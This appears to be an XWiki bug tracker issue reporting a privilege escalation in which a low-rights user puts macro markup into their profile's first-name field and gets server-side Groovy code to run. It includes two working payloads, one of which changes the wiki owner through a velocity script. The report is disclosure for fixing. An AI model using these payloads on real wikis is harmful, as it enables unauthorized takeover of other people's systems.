Details
-
Bug
-
Resolution: Solved By
-
Blocker
-
3.1 M1
-
High
-
Unknown
-
Description
Steps to reproduce
- Log in as a user without script rights.
- Set your first name to
{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}
Expected result:
{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}
is displayed as first name.
Actual result:
The username in the profile is Hello from groovy!
This demonstrates a privilege escalation attack to programming rights. I don't know yet why or how this works as this was primarily a surprise result while trying to reproduce another vulnerability.
I've also verified that you can actually do dangerous stuff, for example
{{async async="true" cached="false" context="doc.reference"}}{{velocity}}#set($descriptor = $services.wiki.currentWikiDescriptor)) #set($void = $descriptor.setOwnerId("XWiki.NewOwner")) #set($void = $services.wiki.saveDescriptor($descriptor)){{/velocity}}{{/async}}
sets the wiki's owner to the given user id.
The affects version is only the version I reproduced the issue on, this is quite likely much older.
Attachments
Issue Links
- duplicates
-
XCOMMONS-2498 XWikiUtils#escapeElementText should also escape {
-
- Closed
-
- links to